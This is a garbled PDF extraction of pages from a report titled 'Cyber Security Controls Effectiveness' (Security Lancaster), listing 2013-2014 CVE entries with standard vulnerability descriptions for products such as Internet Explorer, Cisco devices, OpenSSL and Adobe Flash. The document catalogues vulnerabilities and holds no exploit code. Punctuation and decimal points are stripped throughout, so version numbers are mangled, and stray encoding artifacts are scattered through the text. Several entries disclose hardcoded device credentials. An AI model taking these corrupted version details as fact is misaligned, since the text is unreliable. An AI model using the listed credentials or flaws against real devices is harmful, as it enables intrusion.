CVE-2013-2826WellinTech KingSCADA before312 KingAlarmampEvent before 31and x000D KingGraphic before 312perform authentication on the x000DKAEClientManager console rather than onthe server which allows x000D remoteattackers to bypass intended accessrestrictions and discover x000D credentialsvia a crafted packet to TCP port 8130
CVE-2013-2920The DoResolveRelativeHost functionin urlurl canon relativecc in x000DGoogle Chrome before 300159966 allowsremote attackers to cause a x000Ddenial of service (out-of-bounds read)via a relative URL containing a x000Dhostname as demonstrated by a protocol-relative URL beginning with a x000Dwwwgooglecom substring
CVE-2013-3064Open redirect vulnerability inuidynamicunsecuredhtml inLinksys x000D EA6500 with firmware1128147876 allows remote attackers toredirect x000D users to arbitrary web sitesand conduct phishing attacks via a URLin x000D the target parameter
CVE-2013-3116rdquoMicrosoft Internet Explorer 7 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2013-3137rdquoMicrosoft FrontPage 2003 SP3 does notproperly parse DTDs which allows remoteattackers to obtain sensitive information viacrafted XML data in a FrontPage documentaka rdquordquoXML Disclosure Vulnerabilityrdquordquordquo
CVE-2013-3194rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute x000D arbitrary codeor cause a denial of service (memorycorruption) via a x000D crafted website aka rdquordquoInternet Explorer MemoryCorruption x000D Vulnerabilityrdquordquordquo
CVE-2013-3199rdquoMicrosoft Internet Explorer 6 through10 allows remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted web site aka rdquordquoInternetExplorer Memory x000D CorruptionVulnerabilityrdquordquordquo
CVE-2013-3201rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3203 CVE-2013-3206 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3206
rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3201 CVE-2013-3203 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3280EMC RSA Authentication Agent 71xbefore 712 for Web for Internet x000DInformation Services has a fail-open designwhich allows remote x000D attackers tobypass intended access restrictions viavectors that x000D trigger an agent crash
CVE-2013-3387Cisco Prime Central for HostedCollaboration Solution (HCS)Assurance x000D 86 and 9x before 92(1)allows remote attackers to cause a denialof x000D service (disk consumption) via aflood of TCP packets to port 5400 x000Dleading to large error-log files aka Bug IDCSCua42724
CVE-2013-3417The administrative web interface in CiscoVideo Surveillance Operations Managerdoes not properly perform authenticationwhich allows remote attackers to watchvideo feeds via a crafted URL aka BugID CSCtg72262
CVE-2013-3632The Cron service in rpcphp inOpenMediaVault allows remote x000Dauthenticated users to execute cron jobs asarbitrary users and x000D execute arbitrarycommands via the username parameter
CVE-2013-3656Cybozu Office 910 and earlier doesnot properly manage sessions x000Dwhich allows remote attackers to bypassauthentication by leveraging x000Dknowledge of a login URL
CVE-2013-3856rdquoMicrosoft Word 2003 SP3 and WordViewer allow remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted Office document akardquordquoWord Memory Corruption x000DVulnerabilityrdquordquordquo
CVE-2013-3860rdquoMicrosoft NET Framework 20 SP2 3535 SP1 351 4 and 45 does x000Dnot properly parse a DTD during XMLdigital-signature validation x000D whichallows remote attackers to cause adenial of service x000D (application crashor hang) via a crafted signed XMLdocument aka x000D rdquordquoEntity ExpansionVulnerabilityrdquordquordquo
CVE-2013-3893Use-after-free vulnerability in theSetMouseCapture implementationin x000D mshtmldll in MicrosoftInternet Explorer 6 through 11 allowsremote x000D attackers to executearbitrary code via crafted JavaScript stringsas x000D demonstrated by use of an ms-help URL that triggers loading of x000Dhxdsdll
CVE-2013-3897rdquoUse-after-free vulnerability in theCDisplayPointer class in mshtmldll in
Microsoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via crafted JavaScript code thatuses the onpropertychange event handleras exploited in the wild in September andOctober 2013 aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2013-3900rdquoThe WinVerifyTrust function in MicrosoftWindows XP SP2 and SP3 Windows Server2003 SP2 Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and Windows RTGold and 81 does not properly validate PEfile digests during Authenticode signatureverification which allows remote attackersto execute arbitrary code via a craftedPE file aka rdquordquoWinVerifyTrust SignatureValidation Vulnerabilityrdquordquordquo
CVE-2013-3905rdquoMicrosoft Outlook 2007 SP3 2010 SP1and SP2 2013 and 2013 RT does x000Dnot properly expand metadata containedin SMIME certificates which x000Dallows remote attackers to obtain sensitivenetwork configuration and x000D stateinformation via a crafted certificate in an e-mail message aka x000D rdquordquoSMIME AIAVulnerabilityrdquordquordquo
CVE-2013-4223The Gentoo Nullmailer package before 111-r2 uses world-readable x000D permissionsfor etcnullmailerremotes which allowslocal users to x000D obtain SMTPauthentication credentials by reading thefile
CVE-2013-4436The default configuration for salt-ssh inSalt (aka SaltStack) 0170 x000D doesnot validate the SSH host key of requestswhich allows remote x000D attackers tohave unspecified impact via a man-in-the-middle (MITM) x000D attack
CVE-2013-4478Sup before 01321 and 014x before01411 allows remote attackers x000Dto execute arbitrary commands via shellmetacharacters in the filename x000D ofan email attachment
CVE-2013-4529Buffer overflow in hwpcipcie aerc inQEMU before 172 allows x000D remoteattackers to cause a denial of service andpossibly execute x000D arbitrary code viaa large log num value in a savevm image
CVE-2013-4555Cross-site request forgery(CSRF) vulnerability in x000Decrireactionlogoutphp in SPIP before2124 allows remote attackers x000D tohijack the authentication of arbitrary usersfor requests that x000D logout the uservia unspecified vectors
CVE-2013-4776NETGEAR ProSafe GS724Tv3 andGS716Tv2 with firmware 54113and x000D earlier GS748Tv454114 and GS510TP 5044 allowsremote x000D attackers to cause adenial of service (reboot or crash) viaa crafted x000D HTTP request tofilesystem
CVE-2013-4782
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 21 of 28
The Supermicro BMC implementationallows remote attackers to bypass x000Dauthentication and execute arbitrary IPMIcommands by using cipher x000D suite 0(aka cipher zero) and an arbitrary password
CVE-2013-5057rdquohxdsdll in Microsoft Office 2007 SP3 and2010 SP1 and SP2 does not implementthe ASLR protection mechanism whichmakes it easier for remote attackers toexecute arbitrary code via a crafted COMcomponent on a web site that is visitedwith Internet Explorer as exploited in thewild in December 2013 aka rdquordquoHXDS ASLRVulnerabilityrdquordquordquo
CVE-2013-5369IBM SPSS Analytical Decision Management61 before IF1 62 before x000D IF1 and70 before FP1 IF6 might allow remoteattackers to execute x000D arbitrary codeby deploying and accessing a service
CVE-2013-5428IBM WebSphere DataPower XC10appliances 250 do not require x000Dauthentication for all administrative actionswhich allows remote x000D attackers tocause a denial of service via unspecifiedvectors
CVE-2013-5431Open redirect vulnerability in IBM TivoliFederated Identity Manager x000D(TFIM) 611 before IF 15 620 beforeIF 14 621 and 622 before x000D IF8 and Tivoli Federated Identity ManagerBusiness Gateway (TFIMBG) x000D 611before IF 15 620 before IF 14 621 and622 before IF 8 x000D allows remoteattackers to redirect users to arbitrary websites and x000D conduct phishing attacksvia unspecified vectors
CVE-2013-5494Cross-site request forgery (CSRF)vulnerability in the web framework x000Din Cisco Unified MeetingPlace Solution asused in Unified x000D MeetingPlace WebConferencing and Unified MeetingPlaceallows remote x000D attackers to hijackthe authentication of arbitrary usersaka Bug IDs x000D CSCui45209 andCSCui44674
CVE-2013-5507The IPsec implementation in Cisco AdaptiveSecurity Appliance (ASA) x000D Software91 before 91(17) when an IPsec VPNtunnel is enabled x000D allows remoteattackers to cause a denial of service (devicereload) x000D via a (1) ICMP or (2)ICMPv6 packet that is improperly handledduring x000D decryption aka Bug IDCSCue18975
CVE-2013-5536Cisco Secure Access Control System (ACS)does not properly implement x000D anincoming-packet firewall rule which allowsremote attackers to x000D cause a denialof service (process crash) via a floodof crafted x000D packets aka Bug IDCSCui51521
CVE-2013-5559Buffer overflow in the Active TemplateLibrary (ATL) framework in the x000DVPNAPI COM module in Cisco AnyConnectSecure Mobility Client 2x x000D allowsuser-assisted remote attackers to executearbitrary code via a x000D crafted HTMLdocument aka Bug ID CSCuj58139
CVE-2013-5561The Safe Search enforcement feature inCisco Adaptive Security x000D Appliance(ASA) CX Context-Aware SecuritySoftware does not properly x000D performfiltering which allows remote attackers tobypass intended x000D policy restrictionsvia unspecified vectors aka Bug IDCSCui94622
CVE-2013-5751Directory traversal vulnerability in SAPNetWeaver 7x allows remote x000Dattackers to read arbitrary files viaunspecified vectors
CVE-2013-5757Absolute path traversal vulnerability inYealink VoIP Phone SIP-T38G allowsremote authenticated users to readarbitrary files via a full pathname in thedumpConfigFile function in the commandparameter to cgi-bincgiServerexx
CVE-2013-5828Unspecified vulnerability in the EnterpriseManager Base Platform x000D componentin Oracle Enterprise Manager Grid ControlEM Base Platform x000D 10205 and11101 EM DB Control 11107 11202and 11203 x000D and EM Pluginfor DB 12102 and 12103 allowsremote attackers to x000D affect integrityvia unknown vectors related to StorageManagement
CVE-2013-6167Mozilla Firefox through 27 sends HTTPCookie headers without first x000Dvalidating that they have the requiredcharacter-set restrictions x000D whichallows remote attackers to conduct theequivalent of a x000D persistent LogoutCSRF attack via a crafted parameterthat forces a x000D web application toset a malformed cookie within an HTTPresponse
CVE-2013-6188Cross-site request forgery (CSRF)vulnerability in HP System x000DManagement Homepage (SMH) 71through 722 allows remote attackersto x000D hijack the authentication ofunspecified victims via unknown vectors
CVE-2013-6284rdquoUnspecified vulnerability in the StatutoryReporting for Insurance x000D (FS SR)component in the Financial Servicesmodule for SAP ERP Central x000DComponent (ECC) allows attackersto execute arbitrary code via x000Dunspecified vectors related to a rdquordquocodeinjection vulnerabilityrdquordquordquo
CVE-2013-6396The OpenStack Python client libraryfor Swift (python-swiftclient) 10 x000Dthrough 190 does not verify X509certificates from SSL servers x000D whichallows man-in-the-middle attackers tospoof servers and obtain x000D sensitiveinformation via a crafted certificate
CVE-2013-6475Multiple integer overflows in (1)OPVPOutputDevcxx and (2) x000DoprsOPVPSplashcxx in the pdftoopvpfilter in CUPS and cups-filters x000Dbefore 1047 allow remote attackers toexecute arbitrary code via a x000D craftedPDF file which triggers a heap-based bufferoverflow
CVE-2013-6660The drag-and-drop implementation inGoogle Chrome before 3301750117 doesnot properly restrict the information inWebDropData data structures which allowsremote attackers to discover full pathnamesvia a crafted web site
CVE-2013-6699The Control and Provisioning of WirelessAccess Points (CAPWAP) x000D protocolimplementation on Cisco Wireless LANController (WLC) devices x000D allowsremote attackers to cause a denial of servicevia a crafted x000D CAPWAP packet thattriggers a buffer over-read aka Bug IDCSCuh81880
CVE-2013-6702The management implementation on CiscoONS 15454 controller cards with x000Dsoftware 98 and earlier allows remoteattackers to cause a denial of x000Dservice (card reset) via crafted packets akaBug ID CSCtz50902
CVE-2013-6979The VTY authentication implementation inCisco IOS XE 0302xxSE and 0303xxSEincorrectly relies on the Linux-IOS internal-network configuration which allows remoteattackers to bypass authentication byleveraging access to a 192168x2 sourceIP address aka Bug ID CSCuj90227
CVE-2013-6994OpenText Exceed OnDemand (EoD) 8transmits the session ID in x000D cleartextwhich allows remote attackers to performsession fixation x000D attacks by sniffingthe network
CVE-2013-7004D-Link DSR-150 with firmware before108B44 DSR-150N with firmware before105B64 DSR-250 and DSR-250N withfirmware before 108B44 and DSR-500 DSR-500N DSR-1000 and DSR-1000N with firmware before 108B77have a hardcoded account of usernamegkJ9232xXyruTRmY which makes it easierfor remote attackers to obtain access byleveraging knowledge of the username
CVE-2013-7043Multiple cross-site request forgery (CSRF)vulnerabilities on Cisco x000D ScientificAtlanta DPR2320R2 routers with software202r1262-090417 x000D allow remoteattackers to hijack the authentication ofadministrators x000D for requests that(1) change a password via the Passwordparameter to x000D goformRgSecurity(2) reboot the device via the Restartparameter to x000D goformrestart (3)modify Wi-Fi settings as demonstratedby the x000D WpaPreSharedKeyparameter to goformwlanSecurity or(4) modify x000D parental controls viathe ParentalPassword parameter to x000DgoformRgParentalBasic
CVE-2013-7389Multiple cross-site scripting (XSS)vulnerabilities in D-Link DIR-645 Router(Rev A1) with firmware before 104B11allow remote attackers to inject arbitraryweb script or HTML via the (1) deviceidparameter to parentalcontrolsbindphp(2) RESULT parameter to infophp or (3)receiver parameter to bsc sms sendphp
CVE-2014-0001Buffer overflow in clientmysqlcc in Oracle
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 22 of 28
MySQL and MariaDB before 5535 allowsremote database servers to cause a denialof service (crash) and possibly executearbitrary code via a long server versionstring
CVE-2014-0035The SymmetricBinding in Apache CXFbefore 2613 and 27x before 2710when EncryptBeforeSigning is enabledand the UsernameToken policy is set toan EncryptedSupportingToken transmitsthe UsernameToken in cleartext whichallows remote attackers to obtain sensitiveinformation by sniffing the network
CVE-2014-0160The (1) TLS and (2) DTLSimplementations in OpenSSL 101 before101g do not properly handle HeartbeatExtension packets which allows remoteattackers to obtain sensitive informationfrom process memory via crafted packetsthat trigger a buffer over-read asdemonstrated by reading private keysrelated to d1 bothc and t1 libc aka theHeartbleed bug
CVE-2014-0207The cdf read short sector function in cdfcin file before 519 as used in the Fileinfocomponent in PHP before 5430 and 55xbefore 5514 allows remote attackers tocause a denial of service (assertion failureand application exit) via a crafted CDF file
CVE-2014-0259rdquoMicrosoft Word 2007 SP3 and OfficeCompatibility Pack SP3 allow remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted Office document aka rdquordquoWordMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-0266rdquoThe XMLHTTP ActiveX controls in XMLCore Services 30 in Microsoft WindowsXP SP2 and SP3 Windows Server 2003SP2 Windows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RT Goldand 81 allow remote attackers to bypass theSame Origin Policy via a web page that isvisited in Internet Explorer aka rdquordquoMSXMLInformation Disclosure Vulnerabilityrdquordquordquo
CVE-2014-0294rdquoMicrosoft Forefront Protection 2010for Exchange Server does not properlyparse e-mail content which might allowremote attackers to execute arbitrarycode via a crafted message aka rdquordquoRCEVulnerabilityrdquordquordquo
CVE-2014-0313rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-0321rdquo
CVE-2014-0354The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 100(BFQ6)C0has a hardcoded password of qweasdzxcfor an unspecified account which allowsremote attackers to obtain indexasp loginaccess via an HTTP request
CVE-2014-0362Cross-site scripting (XSS) vulnerability
on Google Search Appliance (GSA)devices before 7014G216 and 72 before720G114 when dynamic navigation isconfigured allows remote attackers to injectarbitrary web script or HTML via inputincluded in a SCRIPT element
CVE-2014-0433Unspecified vulnerability in the MySQLServer component in Oracle MySQL 5613and earlier allows remote attackers to affectavailability via unknown vectors related toThread Pooling
CVE-2014-0488rdquoAPT before 109 does not rdquordquoinvalidaterepository datardquordquo when moving from anunauthenticated to authenticated statewhich allows remote attackers to haveunspecified impact via crafted repositorydatardquo
CVE-2014-0493Adobe Reader and Acrobat 10x before1019 and 11x before 11006 on Windowsand Mac OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-0495
CVE-2014-0494Adobe Digital Editions 201 allowsattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via unspecified vectors
CVE-2014-0498Stack-based buffer overflow in AdobeFlash Player before 117700269 and118x through 120x before 120070on Windows and Mac OS X and before112202341 on Linux Adobe AIR before4001628 on Android Adobe AIR SDKbefore 4001628 and Adobe AIR SDK ampCompiler before 4001628 allows attackersto execute arbitrary code via unspecifiedvectors
CVE-2014-0515Buffer overflow in Adobe Flash Playerbefore 117700279 and 118x through130x before 1300206 on Windows andOS X and before 112202356 on Linuxallows remote attackers to execute arbitrarycode via unspecified vectors as exploitedin the wild in April 2014
CVE-2014-0533Cross-site scripting (XSS) vulnerability inAdobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allows remoteattackers to inject arbitrary web script orHTML via unspecified vectors a differentvulnerability than CVE-2014-0531 and CVE-2014-0532
CVE-2014-0536Adobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allow attackersto execute arbitrary code or cause a denial ofservice (memory corruption) via unspecifiedvectors
CVE-2014-0562rdquoCross-site scripting (XSS) vulnerability in
Adobe Reader and Acrobat 10x before10112 and 11x before 11009 on OS Xallows remote attackers to inject arbitraryweb script or HTML via unspecified vectorsaka rdquordquoUniversal XSS (UXSS)rdquordquordquo
CVE-2014-0577rdquoAdobe Flash Player before 1300252and 14x and 15x before 1500223 onWindows and OS X and before 112202418on Linux Adobe AIR before 1500356Adobe AIR SDK before 1500356 andAdobe AIR SDK amp Compiler before1500356 allow attackers to executearbitrary code by leveraging an unspecifiedrdquordquotype confusionrdquordquo a different vulnerabilitythan CVE-2014-0584 CVE-2014-0585CVE-2014-0586 and CVE-2014-0590rdquo
CVE-2014-0765Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along GotoCmd argument
CVE-2014-0767Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along AccessCode argument
CVE-2014-0783Stack-based buffer overflow inBKHOdeqexe in Yokogawa CENTUMCS 3000 R30950 and earlier allows remoteattackers to execute arbitrary code via acrafted TCP packet
CVE-2014-1330WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1342WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1349Use-after-free vulnerability in Safari inApple iOS before 712 allows remoteattackers to execute arbitrary code or causea denial of service (application crash) viaan invalid URL
CVE-2014-1356Heap-based buffer overflow in launchdin Apple iOS before 712 Apple OS Xbefore 1094 and Apple TV before 612allows attackers to execute arbitrary codevia a crafted application that sends IPCmessages
CVE-2014-1370The byte-swapping implementation incopyfile in Apple OS X before 1094 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsmemory access and application crash) via acrafted AppleDouble file in a ZIP archive
CVE-2014-1379Graphics Drivers in Apple OS X before1094 allows attackers to gain privilegesor cause a denial of service (NULL pointerdereference and system crash) via a 32-bit
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 23 of 28
executable file for a crafted application
CVE-2014-1382WebKit as used in Apple iOS before712 Apple Safari before 615 and 7xbefore 705 and Apple TV before 612allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption and application crash) via acrafted web site a different vulnerabilitythan other WebKit CVEs listed in APPLE-SA-2014-06-30-1 APPLE-SA-2014-06-30-3 and APPLE-SA-2014-06-30-4
CVE-2014-1466SQL injection vulnerability in CSP MySQLUser Manager 23 allows remote attackersto execute arbitrary SQL commands via thelogin field of the login page
CVE-2014-1472Multiple cross-site scripting (XSS)vulnerabilities in the Enterprise Managerin McAfee Vulnerability Manager (MVM)755 and earlier allow remote attackers toinject arbitrary web script or HTML viaunspecified vectors
CVE-2014-1477Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before270 Firefox ESR 24x before 243Thunderbird before 243 and SeaMonkeybefore 224 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1518Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before290 Firefox ESR 24x before 245Thunderbird before 245 and SeaMonkeybefore 226 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1563Use-after-free vulnerability in themozillaDOMSVGLengthGetTearOfffunction in Mozilla Firefox before 320Firefox ESR 31x before 311 andThunderbird 31x before 311 allows remoteattackers to execute arbitrary code orcause a denial of service (heap memorycorruption) via an SVG animation withDOM interaction that triggers incorrectcycle collection
CVE-2014-1565The mozilladomAudioEventTimelinefunction in the Web Audio APIimplementation in Mozilla Firefox before320 Firefox ESR 31x before 311 andThunderbird 31x before 311 does notproperly create audio timelines whichallows remote attackers to obtain sensitiveinformation from process memory or causea denial of service (out-of-bounds read) viacrafted API calls
CVE-2014-1586contentbasesrcnsDocumentcpp inMozilla Firefox before 330 Firefox ESR31x before 312 and Thunderbird 31xbefore 312 does not consider whetherWebRTC video sharing is occurring whichallows remote attackers to obtain sensitiveinformation from the local camera in certainIFRAME situations by maintaining a sessionafter the user temporarily navigates away
CVE-2014-1701
The GenerateFunction function inbindingsscriptscode generator v8pmin Blink as used in Google Chrome before3301750149 does not implement acertain cross-origin restriction for theEventTargetdispatchEvent functionwhich allows remote attackers to conductUniversal XSS (UXSS) attacks via vectorsinvolving events
CVE-2014-1740Multiple use-after-free vulnerabilities innetwebsocketswebsocket jobcc in theWebSockets implementation in GoogleChrome before 3401847137 allow remoteattackers to cause a denial of service orpossibly have unspecified other impact viavectors related to WebSocketJob deletion
CVE-2014-1744Integer overflow in the AudioInputRendererHostOnCreateStream functionin contentbrowserrendererhostmediaaudio input renderer hostccin Google Chrome before 3501916114allows remote attackers to cause a denial ofservice or possibly have unspecified otherimpact via vectors that trigger a largeshared-memory allocation
CVE-2014-1753rdquoMicrosoft Internet Explorer 6 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-1806rdquoThe NET Remoting implementation inMicrosoft NET Framework 11 SP120 SP2 35 351 4 45 and451 does not properly restrict memoryaccess which allows remote attackers toexecute arbitrary code via vectors involvingmalformed objects aka rdquordquoTypeFilterLevelVulnerabilityrdquordquordquo
CVE-2014-1808rdquoMicrosoft Office 2013 Gold SP1 RTand RT SP1 allows remote attackers toobtain sensitive token information via aweb site that sends a crafted responseduring opening of an Office document akardquordquoToken Reuse Vulnerabilityrdquordquordquo
CVE-2014-1811rdquoThe TCP implementation in MicrosoftWindows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RTGold and 81 allows remote attackers tocause a denial of service (non-paged poolmemory consumption and system hang) viamalformed data in the Options field of aTCP header aka rdquordquoTCP Denial of ServiceVulnerabilityrdquordquordquo
CVE-2014-1812rdquoThe Group Policy implementation inMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows7 SP1 Windows 8 Windows 81 andWindows Server 2012 Gold and R2 does notproperly handle distribution of passwordswhich allows remote authenticated users toobtain sensitive credential information andconsequently gain privileges by leveragingaccess to the SYSVOL share as exploited inthe wild in May 2014 aka rdquordquoGroup PolicyPreferences Password Elevation of PrivilegeVulnerabilityrdquordquordquo
CVE-2014-2014imapsync before 1584 when running withthe ndashtls option attempts a cleartext loginwhen a certificate verification failure occurswhich allows remote attackers to obtaincredentials by sniffing the network
CVE-2014-2103Cisco Intrusion Prevention System (IPS)Software allows remote attackers to cause adenial of service (MainApp process outage)via malformed SNMP packets aka Bug IDsCSCum52355 and CSCul49309
CVE-2014-2109The TCP Input module in Cisco IOS122 through 124 and 150 through 154when NAT is used allows remote attackersto cause a denial of service (memoryconsumption or device reload) via craftedTCP packets aka Bug IDs CSCuh33843and CSCuj41494
CVE-2014-2364Multiple stack-based buffer overflows inAdvantech WebAccess before 72 allowremote attackers to execute arbitrary codevia a long string in the (1) ProjectName(2) SetParameter (3) NodeName(4) CCDParameter (5) SetColor (6)AlarmImage (7) GetParameter (8)GetColor (9) ServerResponse (10)SetBaud or (11) IPAddress parameterto an ActiveX control in (a) webvactocx(b) dvsocx or (c) webdactocx
CVE-2014-2416Unspecified vulnerability in the OracleData Integrator component in OracleFusion Middleware 111130 allows remoteattackers to affect availability via unknownvectors related to Data Quality a differentvulnerability than CVE-2014-2407 CVE-2014-2415 CVE-2014-2417 and CVE-2014-2418
CVE-2014-2554OTRS 31x before 3121 32x before3216 and 33x before 336 allows remoteattackers to conduct clickjacking attacks viaan IFRAME element
CVE-2014-2643Unspecified vulnerability in HP SystemsInsight Manager (SIM) before 74 allowsremote authenticated users to gainprivileges via unknown vectors
CVE-2014-2742rdquoIsode M-Link before 160v7 does notproperly restrict the processing ofcompressed XML elements which allowsremote attackers to cause a denial of service(resource consumption) via a crafted XMPPstream aka an rdquordquoxmppbombrdquordquo attackrdquo
CVE-2014-2768rdquoMicrosoft Internet Explorer 6 through 8allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2773rdquo
CVE-2014-2789rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2795 CVE-2014-2798 andCVE-2014-2804rdquo
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 24 of 28
CVE-2014-2791rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted web site aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-2794rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2788rdquo
CVE-2014-2808rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2796 CVE-2014-2825CVE-2014-4050 CVE-2014-4055 and CVE-2014-4067rdquo
CVE-2014-2821rdquoMicrosoft Internet Explorer 8 and 9 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-3444The GetGUID function in codecsdmp4dllin RealNetworks RealPlayer 160351 andearlier allows remote attackers to executearbitrary code or cause a denial of service(write access violation and applicationcrash) via a malformed 3gp file
CVE-2014-3489libutilmiq-passwordrb in Red HatCloudForms 30 Management Engine(CFME) before 5242 uses a hard-codedsalt which makes it easier for remoteattackers to guess passwords via a bruteforce attack
CVE-2014-3507Memory leak in d1 bothc in the DTLSimplementation in OpenSSL 098 before098zb 100 before 100n and 101before 101i allows remote attackersto cause a denial of service (memoryconsumption) via zero-length DTLSfragments that trigger improper handling ofthe return value of a certain insert function
CVE-2014-3556rdquoThe STARTTLS implementation inmailngx mail smtp handlerc in the SMTPproxy in nginx 15x and 16x before 161and 17x before 174 does not properlyrestrict IO buffering which allows man-in-the-middle attackers to insert commandsinto encrypted SMTP sessions by sending acleartext command that is processed afterTLS is in place related to a rdquordquoplaintextcommand injectionrdquordquo attack a similar issueto CVE-2011-0411rdquo
CVE-2014-3580The mod dav svn Apache HTTPD servermodule in Apache Subversion 1x before1719 and 18x before 1811 allows remoteattackers to cause a denial of service (NULLpointer dereference and server crash) via aREPORT request for a resource that doesnot exist
CVE-2014-3814
The Juniper Networks NetScreen Firewalldevices with ScreenOS before 63r17 whenconfigured to use the internal DNS lookupclient allows remote attackers to cause adenial of service (crash and reboot) viaa sequence of malformed packets to thedevice IP
CVE-2014-3819Juniper Junos 114 before 114R12 121before 121R10 121X44 before 121X44-D35 121X45 before 121X45-D25121X46 before 121X46-D20 121X47before 121X47-D10 122 before 122R8123 before 123R7 131 before 131R4132 before 132R4 133 before 133R2and 141 before 141R1 when Auto-RP isenabled allows remote attackers to causea denial of service (RDP routing processcrash and restart) via a malformed PIMpacket
CVE-2014-3872Multiple SQL injection vulnerabilities inthe administration login page in D-LinkDAP-1350 (Rev A1) with firmware114 and earlier allow remote attackers toexecute arbitrary SQL commands via the(1) username or (2) password
CVE-2014-4044OpenAFS 168 does not properly clear thefields in the host structure which allowsremote attackers to cause a denial of service(uninitialized memory access and crash)via unspecified vectors related to TMAYrequests
CVE-2014-4079rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090 CVE-2014-4094CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
